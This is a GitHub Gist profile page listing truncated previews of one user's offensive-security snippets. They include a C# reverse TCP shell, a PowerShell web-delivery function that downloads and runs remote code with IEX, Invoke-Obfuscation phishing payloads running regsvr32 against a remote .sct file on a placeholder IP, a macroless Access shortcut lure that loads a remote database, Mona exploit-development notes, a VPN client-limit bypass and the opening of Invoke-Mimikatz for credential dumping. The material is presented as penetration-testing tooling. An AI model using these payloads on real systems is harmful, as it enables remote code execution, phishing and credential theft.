Skip to content

Instantly share code, notes, and snippets.

View adon90's full-sized avatar

aDoN adon90

165 followers · 21 following
  • Spain
View GitHub Profile
@adon90
adon90 / VulnerableDotNetHTTPRemoting.cs
Created March 20, 2019 17:24
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
{
public class DateTimeServer : MarshalByRefObject, IDisposable
@adon90
adon90 / Frida
Created October 29, 2018 13:11
import sys
import pefile
import frida
def on_message(message, data):
print "[%s] -> %s" % (message, data)
@adon90
adon90 / ReverseC#TCP
Last active September 30, 2018 14:51
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
{
@adon90
adon90 / powershell_api.txt
Created July 23, 2018 09:39
"@
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class GetAddress
{
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
@adon90
adon90 / exploiting.txt
Last active February 22, 2021 10:06
Exploiting Tricks
Mona tricks:
---------------
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
-----------------
@adon90
adon90 / runas-cabesha-webdelivery
Last active July 17, 2018 10:18
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
}
@adon90
adon90 / bypassvpn.txt
Last active July 10, 2018 08:07
Bypass VPN Number of Clients
HOST
openvpn adon901.ovpn
COMPUTER 1
sshuttle -vr root@HOST 10.10.0.0/8
COMPUTER 2
sshuttle -vr root@HOST 10.10.0.0/8
HOST:
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80
@adon90
adon90 / phishing.txt
Last active August 27, 2022 13:24
1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
e.g
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
@adon90
adon90 / Database3.accde
Last active July 4, 2018 13:08
Phishing Access Macroless .MAM Extension
------Database Shortcut--------
[Shortcut Properties]
AccessShortcutVersion=1
DatabaseName=Database3.accdb
ObjectName=pwnid
ObjectType=Macro
Computer=W10PTTEST
DatabasePath=http://IP/Database3.accde
EnableRemote=0
CreationTime= 1d4138fe237a9fc
@adon90
adon90 / mimikatz.ps1
Last active May 29, 2018 10:41
PowerShell Shellcode Injection fix on Win 10 (v1803)
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.